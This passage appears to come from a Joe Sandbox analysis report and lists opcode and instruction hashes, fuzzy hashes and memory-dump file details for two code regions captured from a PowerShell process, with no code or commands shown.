                                                                                                                  • Opcode ID: 482243cf0f897b519f93be09887f7efca5522d08d3a6d8b7e57c6c14161f9246
                                                                                                                  • Instruction ID: 785266d5213925f2d1380b820600e71516b078a0ff7688268fd09a1f96d39751
                                                                                                                  • Opcode Fuzzy Hash: 482243cf0f897b519f93be09887f7efca5522d08d3a6d8b7e57c6c14161f9246
                                                                                                                  • Instruction Fuzzy Hash: 0251F662A0F6E65FEB2247794C6A0953FA0FF1675071A01F7C4E58B0A3FC142A078B91
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1900067030.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: K_^$K_^$K_^$K_^
                                                                                                                  • API String ID: 0-4267328068
                                                                                                                  • Opcode ID: e797d2af31db1e8b2156e261391c5896df230c8496c01d9dc42b4d818821952c
                                                                                                                  • Instruction ID: 333f62f0971e0ad9a56690411811a42ed45aa7a1aaeb199a5f19b7b23129b790
                                                                                                                  • Opcode Fuzzy Hash: e797d2af31db1e8b2156e261391c5896df230c8496c01d9dc42b4d818821952c
                                                                                                                  • Instruction Fuzzy Hash: 0131E662A0F7DA9BEB265B7D5CA90D43F70FF11ADCB0A02F7C4E846063EC1466074A85